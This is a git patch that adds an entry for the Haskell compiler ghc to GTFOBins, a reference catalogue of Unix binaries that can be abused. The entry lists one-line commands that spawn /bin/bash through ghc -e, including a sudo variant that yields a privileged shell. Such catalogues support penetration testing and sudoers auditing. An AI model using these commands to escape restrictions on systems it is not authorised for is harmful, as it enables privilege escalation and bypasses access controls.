From 106dede9dacb92c1d30d4a315d182cf392a02987 Mon Sep 17 00:00:00 2001 From: Ryan Saridar <8403417+VortixDev@users.noreply.github.com> Date: Thu, 22 Oct 2020 17:20:23 +0100 Subject: [PATCH] Add ghc binary --- _gtfobins/ghc.md | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 _gtfobins/ghc.md diff --git a/_gtfobins/ghc.md b/_gtfobins/ghc.md new file mode 100644 index 0000000..4ebb590 --- /dev/null +++ b/_gtfobins/ghc.md @@ -0,0 +1,7 @@ +--- +functions: + shell: + - code: ghc -e 'System.Process.callCommand "/bin/bash"' + sudo: + - code: sudo ghc -e 'System.Process.callCommand "/bin/bash"' +---